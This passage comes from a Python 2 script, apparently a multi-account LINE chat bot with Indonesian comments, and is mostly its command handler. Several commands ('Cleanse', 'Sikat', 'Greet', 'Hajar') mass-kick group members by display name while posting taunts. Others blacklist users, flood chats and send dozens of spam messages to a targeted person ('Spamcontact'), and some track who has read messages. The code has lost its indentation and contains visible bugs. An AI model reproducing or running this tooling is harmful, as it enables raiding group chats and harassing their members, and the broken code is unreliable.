#=================================================
elif "Bot1 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydn.txt',"r")
name = h.read()
h.close()
x = name
profile = cl.getProfile()
profile.displayName = x
cl.updateProfile(profile)
i = open('mysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = cl.getProfile()
cak.statusMessage = y
cl.updateProfile(cak)
j = open('myps.txt',"r")
ps = j.read()
j.close()
p = ps
cl.updateProfilePicture(p)
cl.sendText(msg.to, "Succes")
except Exception as e:
cl.sendText(msg.to,"Gagagl!")
print e
elif "Bot2 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ki.getProfile()
profile.displayName = x
ki.updateProfile(profile)
i = open('myesm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ki.getProfile()
cak.statusMessage = y
ki.updateProfile(cak)
j = open('mypfs.txt',"r")
ps = j.read()
j.close()
p = ps
ki.updateProfilePicture(p)
ki.sendText(msg.to, "Succes")
except Exception as e:
ki.sendText(msg.to,"Gagagl!")
print e
elif "Bot3 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('msgydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kk.getProfile()
profile.displayName = x
kk.updateProfile(profile)
i = open('mysfdgm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kk.getProfile()
cak.statusMessage = y
kk.updateProfile(cak)
j = open('gymyps.txt',"r")
ps = j.read()
j.close()
p = ps
kk.updateProfilePicture(p)
kk.sendText(msg.to, "Succes")
except Exception as e:
kk.sendText(msg.to,"Gagagl!")
print e
elif "Bot4 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('jhmydn.txt',"r")
name = h.read()
h.close()
x = name
profile = kc.getProfile()
profile.displayName = x
kc.updateProfile(profile)
i = open('myhfsm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kc.getProfile()
cak.statusMessage = y
kc.updateProfile(cak)
j = open('mypfhs.txt',"r")
ps = j.read()
j.close()
p = ps
kc.updateProfilePicture(p)
kc.sendText(msg.to, "Succes")
except Exception as e:
kc.sendText(msg.to,"Gagagl!")
print e
elif "Bot5 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('madydn.txt',"r")
name = h.read()
h.close()
x = name
profile = ks.getProfile()
profile.displayName = x
ks.updateProfile(profile)
i = open('mysgjm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = ks.getProfile()
cak.statusMessage = y
ks.updateProfile(cak)
j = open('myrdps.txt',"r")
ps = j.read()
j.close()
p = ps
ks.updateProfilePicture(p)
ks.sendText(msg.to, "Succes")
except Exception as e:
ks.sendText(msg.to,"Gagagl!")
print e
elif "Bot6 backup" in msg.text:
if msg.from_ in admin:
try:
h = open('mydnsgv.txt',"r")
name = h.read()
h.close()
x = name
profile = k1.getProfile()
profile.displayName = x
k1.updateProfile(profile)
i = open('jhmysm.txt',"r")
sm = i.read()
i.close()
y = sm
cak = kt.getProfile()
cak.statusMessage = y
k1.updateProfile(cak)
j = open('myiyps.txt',"r")
ps = j.read()
j.close()
p = ps
k1.updateProfilePicture(p)
k1.sendText(msg.to, "Succes")
except Exception as e:
k1.sendText(msg.to,"Gagagl!")
print e
#=================================================
elif msg.text == "Sider":
if msg.from_ in admin:
cl.sendText(msg.to, "CCTV sedang di proses......")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,"%H:%M")
wait2['ROM'][msg.to] = {}
#print wait2
elif msg.text == "Ciduk":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
#print rom
chiya += rom[1] + "\n"
cl.sendText(msg.to, "||Di Read Oleh||%s\n||By : By babang adhi\n\n>Pelaku CCTV<\n%s-=CCTV=-[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
else:
cl.sendText(msg.to, "Ketik Cctv dulu Oneng")
elif msg.text == "Cctv":
if msg.from_ in admin:
cl.sendText(msg.to, "Siap di intip....")
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
now2 = datetime.now()
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] Reset"
elif msg.text == "Intip":
if msg.from_ in admin:
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
chiya = ""
else:
chiya = ""
for rom in wait2["ROM"][msg.to].items():
print "[Command] Check"
chiya += rom[1] + "\n"
cl.sendText(msg.to, "✔ ✰ TEAM BONDS KILLS ✰\nRead : %s\n\n✖ Sider :\n%s\nPoint creation date n time:\n[%s]" % (wait2['readMember'][msg.to],chiya,setTime[msg.to]))
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.strftime(now2,'%Y-%m-%d %H:%M:%S')
wait2['ROM'][msg.to] = {}
print "[Command] reset"
else:
cl.sendText(msg.to,"Read point tidak tersedia, Silahkan ketik Cctv untuk membuat Read point.")
#-----------------------------------------------
#---------------FUNGSI RATAIN GRUP TANPA KICK SESAMA BOT/Admin/Bots----------#
elif "Cleanse" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok cleanse"
_name = msg.text.replace("Cleanse","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
cl.sendText(msg.to,"Just some casual cleansing ")
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"you are not admin")
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki,kk,kc,ks,k1]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Group cleanse")
#-----------------------------------------------
#----------------Fungsi Join Group Start-----------------------#
elif msg.text in ["Join","Masuk"]: #Panggil Semua Bot
if msg.from_ in admin:
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kk.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
kc.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
ks.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k1.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k3.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k4.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
k5.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
print "Semua Sudah Lengkap"
elif msg.text in ["Kampret join"]:
if msg.form_ in admin:
x = ki.getGroup(msg.to)
x.preventJoinByTicket = False
ki.updateGroup(x)
invsend = 0
Ti = ki.reissueGroupTicket(msg.to)
cl.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki.getGroup(msg.to)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(msg.to)
elif msg.text in ["Luffy join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Zorro join"]:
if msg.from_ in admin:
x = cl.getGroup(msg.to)
x.preventJoinByTicket = False
cl.updateGroup(x)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kk.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
elif msg.text in ["Sanji Join"]:
if msg.from_ in admin:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
kc.acceptGroupInvitationByTicket(msg.to,Ti)
G = cl.getGroup(msg.to)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(msg.to)
#----------------------Fungsi Join Group Finish---------------#
#-------------Fungsi Leave Group Start---------------#
elif msg.text in ["Balik all"]: #Bot Ninggalin Group termasuk Bot Induk
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
k1.leaveGroup(msg.to)
k2.leaveGroup(msg.to)
k3.leaveGroup(msg.to)
k4.leaveGroup(msg.to)
k5.leaveGroup(msg.to)
cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Pulang"]: #Semua Bot Ninggalin Group Kecuali Bot Induk
if msg.from_ in admin:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
kk.leaveGroup(msg.to)
kc.leaveGroup(msg.to)
ks.leaveGroup(msg.to)
k1.leaveGroup(msg.to)
k2.leaveGroup(msg.to)
k3.leaveGroup(msg.to)
k4.leaveGroup(msg.to)
k5.leaveGroup(msg.to)
#cl.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye zorro"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye sanji"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Bye Ussop"]:
if msg.from_ in owner:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe1"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
ki.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe2"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kk.leaveGroup(msg.to)
except:
pass
elif msg.text in ["Ojo koyo kuwe3"]:
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
kc.leaveGroup(msg.to)
except:
pass
#-------------Fungsi Leave Group Finish---------------#
#-------------Fungsi Tag All Start---------------#
elif msg.text in ["Assalammualaikum"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
cb = ""
cb2 = ""
strt = int(0)
akh = int(0)
for md in nama:
akh = akh + int(6)
cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
strt = strt + int(7)
akh = akh + 1
cb2 += "@nrik \n"
cb = (cb[:int(len(cb)-1)])
msg.contentType = 0
msg.text = cb2
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
try:
cl.sendMessage(msg)
except Exception as error:
print error
elif msg.text in ["Halo"]:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
nm1, nm2, nm3, nm4, nm5, jml = [], [], [], [], [], len(nama)
if jml <= 100:
mention2(msg.to, nama)
if jml > 100 and jml < 200:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, len(nama)):
nm2 += [nama[j]]
mention2(msg.to, nm2)
if jml > 200 and jml < 300:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, len(nama)):
nm3 += [nama[k]]
mention2(msg.to, nm3)
if jml > 300 and jml < 400:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, len(nama)):
nm4 += [nama[l]]
mention2(msg.to, nm4)
if jml > 400 and jml < 500:
for i in range(0, 100):
nm1 += [nama[i]]
mention2(msg.to, nm1)
for j in range(101, 200):
nm2 += [nama[j]]
mention2(msg.to, nm2)
for k in range(201, 300):
nm3 += [nama[k]]
mention2(msg.to, nm3)
for l in range(301, 400):
nm4 += [nama[l]]
mention2(msg.to, nm4)
for h in range(401, len(nama)):
nm5 += [nama[h]]
mention2(msg.to, nm5)
if jml > 500:
cl.sendText(msg.to,'Member melebihi batas.')
cnt = Message()
cnt.text = "Done : " + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
#-------------Fungsi Tag All Finish---------------#
elif msg.text in ["Bot Like", "Bot like"]: #Semua Bot Ngelike Status Akun Utama
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
likePost()
except:
pass
elif msg.text in ["Like temen", "Bot like temen"]: #Semua Bot Ngelike Status Teman
if msg.from_ in owner:
print "[Command]Like executed"
cl.sendText(msg.to,"Kami Siap Like Status Teman Boss")
cl.sendText(msg.to,"Kami Siap Like Status Owner\nKami Delay untuk beberapa Detik\nJangan perintah kami dulu sampai kami Selesai Ngelike")
try:
autolike()
except:
pass
#----------------Fungsi Banned Kick Target Start-----------------------#
elif msg.text in ["Kill "]:
if msg.from_ in admin:
if msg.toType == 2:
group = random.choice(KAC).getGroup(msg.to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, gMembMids)
if matched_list == []:
random.choice(KAC).sendText(msg.to,"Selamat tinggal")
random.choice(KAC).sendText(msg.to,"Jangan masuk lagidevil smile")
return
for jj in matched_list:
try:
klist=[cl,ki,kk,kc,ks]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[jj])
print (msg.to,[jj])
except:
pass
#----------------Fungsi Banned Kick Target Finish----------------------#
elif "Sikat" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Sikat","")
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
random.choice(KAC).sendText(msg.to,"Eh Ini Room apaan?")
random.choice(KAC).sendText(msg.to,"Ratain aja lah\nRoom Ga Berguna..")
random.choice(KAC).sendText(msg.to,"Jangan Baper yah;")
msg.contentType = 13
# msg.contentMetadata = {'mid': mid}
random.choice(KAC).sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
if target in Bots:
pass
if target in admin:
pass
else:
try:
klist=[cl,ki,kk,kc,ks,k1,k2,k3,k4]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(msg.to,"Koq Ga Ditangkis Wooyyy?\Lemah Banget Nih Room")
elif "Greet" in msg.text:
if msg.from_ in owner:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("Greet","")
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
ki.sendText(msg.to,"maaf kalo gak sopan")
kk.sendText(msg.to,"makasih semuanya..")
kc.sendText(msg.to,"hehehhehe")
msg.contentType = 13
#msg.contentMetadata = {'mid': mid}
ks.sendMessage(msg)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Not found")
else:
for target in targets:
if target not in Bots:
try:
klist=[ki,kk,kc,ks,k1,k2,k3]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
ki.sendText(msg.to,"Group cleanse")
kk.sendText(msg.to,"Group cleanse")
kc.sendText(msg.to,"Group cleanse")
#----------------Fungsi Kick User Target Start----------------------#
elif "Nk " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
random.choice(KAC).kickoutFromGroup(msg.to,[target])
elif "Hajar " in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Hajar ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
satpam.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.01)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
satpam.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
satpam.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
cl.updateGroup(gs)
#----------------Fungsi Kick User Target Finish----------------------#
elif "Blacklist @ " in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Blacklist @ ","")
_kicktarget = _name.rstrip(' ')
gs = random.choice(KAC).getGroup(msg.to)
targets = []
for g in gs.members:
if _kicktarget == g.displayName:
targets.append(g.mid)
if targets == []:
random.choice(KAC).sendText(msg.to,"Not found")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Succes Plak")
except:
random.choice(KAC).sendText(msg.to,"error")
#----------------Fungsi Banned User Target Start-----------------------#
elif "Banned @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Banned] Sukses"
_name = msg.text.replace("Banned @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Dilarang Banned Bot")
ki.sendText(msg.to,"Dilarang Banned Bot")
kk.sendText(msg.to,"Dilarang Banned Bot")
kc.sendText(msg.to,"Dilarang Banned Bot")
else:
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
random.choice(KAC).sendText(msg.to,"Akun telah sukses di banned")
except:
random.choice(KAC).sendText(msg.to,"Error")
#----------------Fungsi Banned User Target Finish-----------------------#
#----------------Mid via Tag--------------
elif "Mid @" in msg.text:
if msg.from_ in admin:
_name = msg.text.replace("Mid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
random.choice(KAC).sendText(msg.to, g.mid)
else:
pass
#-----------------------------------------
#----------------Fungsi Unbanned User Target Start-----------------------#
elif "Unban @" in msg.text:
if msg.from_ in admin:
if msg.toType == 2:
print "[Unban] Sukses"
_name = msg.text.replace("Unban @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
gs = ki.getGroup(msg.to)
gs = kk.getGroup(msg.to)
gs = kc.getGroup(msg.to)
gs = ks.getGroup(msg.to)
gs = k1.getGroup(msg.to)
gs = k2.getGroup(msg.to)
gs = k3.getGroup(msg.to)
gs = k4.getGroup(msg.to)
gs = k5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Tidak Ditemukan.....")
ki.sendText(msg.to,"Tidak Ditemukan.....")
kk.sendText(msg.to,"Tidak Ditemukan.....")
kc.sendText(msg.to,"Tidak Ditemukan.....")
else:
for target in targets:
try:
del wait["blacklist"][target]
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Akun Bersih Kembali")
except:
ki.sendText(msg.to,"Error")
#----------------Fungsi Unbanned User Target Finish-----------------------#
#-------------Fungsi Spam Start---------------------#
elif msg.text in ["Up","up","Up Chat","Up chat","up chat","Upchat","upchat"]:
if msg.from_ in admin:
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
cl.sendText(msg.to,"P squared up!")
ki.sendText(msg.to,"P squared up!")
kk.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k1.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
k2.sendText(msg.to,"P squared up!")
#-------------Fungsi Spam Finish---------------------#
#----------------------------[Spam To Contact]----------------------------#WORK
elif "Spamcontact @" in msg.text:
if msg.from_ in owner:
_name = msg.text.replace("Spamcontact @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
cl.sendText(g.mid,"Ini Adalah Spam")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
kk.sendText(g.mid,"Jangan Ngintip")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
k1.sendText(g.mid,"Masuk Room Woy...!!!")
cl.sendText(msg.to, "Target Spam, Done...!!!")
kk.sendText(msg.to, "Target Spam, Done...!!!")
k1.sendText(msg.to, "Target Spam, Done...!!!")
print " Spammed !"
#----------------------------[Spam To Contact]----------------------------#WORK
#--------------------Start-----------------------#
elif "Apakah " in msg.text:
tanya = msg.text.replace("Apakah ","")
jawab = ("Ya","Tidak","Bisa Jadi","Jangan berharap")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Berapa besar cinta " in msg.text:
tanya = msg.text.replace("Berapa besar cinta ","")
jawab = ("0%","25%","50%","75%","100%")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Siapakah cewek " in msg.text:
tanya = msg.text.replace("Siapakah cewek ","")
jawab = ("Maryati�","Ida�","Uke�","Alyn�","Ikka�","Yunikey�","Qwenie�","Gendis�","Aryani�","Nindy�","Wina�","Dewi�","Ifah�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Siapakah cowok " in msg.text:
tanya = msg.text.replace("Siapakah cowok ","")
jawab = ("Arjun�","Ahmad khan�","Hajir�","Dd�","Indra�","Jeong�","Yogi�","Ary�","Ucil�")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Adakah " in msg.text:
tanya = msg.text.replace("Adakah ","")
jawab = ("Tidak tahu.","Ada.","Tidak ada.","Mungkin ada")
jawaban = random.choice(jawab)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
cl.sendText(msg.to,jawaban)
elif "Cakepkah " in msg.text:
tanya = msg.text.replace("Cakepkah ","")
